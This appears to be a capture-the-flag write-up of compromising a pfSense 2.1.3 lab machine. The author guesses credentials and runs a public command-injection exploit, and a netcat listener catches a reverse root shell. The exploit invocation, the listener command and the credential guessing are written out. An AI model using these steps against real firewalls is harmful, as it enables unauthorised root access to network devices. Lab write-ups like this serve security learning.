OS: FreeBSD, Difficulty: Easy, IP:

Initial Enumeration

# Nmap 7.80 scan initiated Fri Sep 27 18:41:07 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 80,443
Nmap scan report for
Host is up (0.24s latency).
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open ssl/https?
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), OpenBSD 4.X (85%)
OS CPE: cpe:/o:openbsd:openbsd:4.3
Aggressive OS guesses: Comau C4G robot control unit (92%), OpenBSD 4.3 (85%), OpenBSD 4.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
1 243.80 ms
2 243.69 ms
OS and Service detection performed. Please report any incorrect results at .
# Nmap done at Fri Sep 27 18:42:59 2019 -- 1 IP address (1 host up) scanned in 111.85 seconds

Checking out the page, it turns out it the login interface of pfsense and the default credentials of admin:pfsesne did not seem to work. So I ran gobuster on the URL and found a txt file called system-users.txt which contained the username rohit and password was supposed to be company default, so I chose to try pfsense and this combination got me into the dashboard.

As evident from the version information this is pfsense 2.1.3, so I ran this service and version info against searchsploit and found one command injection vulnerability.

-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | exploits/php/webapps/
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

User and Root own

So I ran the exploit script with the parameters it required and was able to get a shell as root on the system.

python3.7 --username rohit --password pfsense --lhost --rhost --lport 5555
$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [] from (UNKNOWN) [] 21729
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# cat /root/root.txt
# cat /home/rohit/user.txt

Learning outcome

I need to find better word-list which are more comprehensive and thorough in terms of research. The ones I used, just barely got me through this time.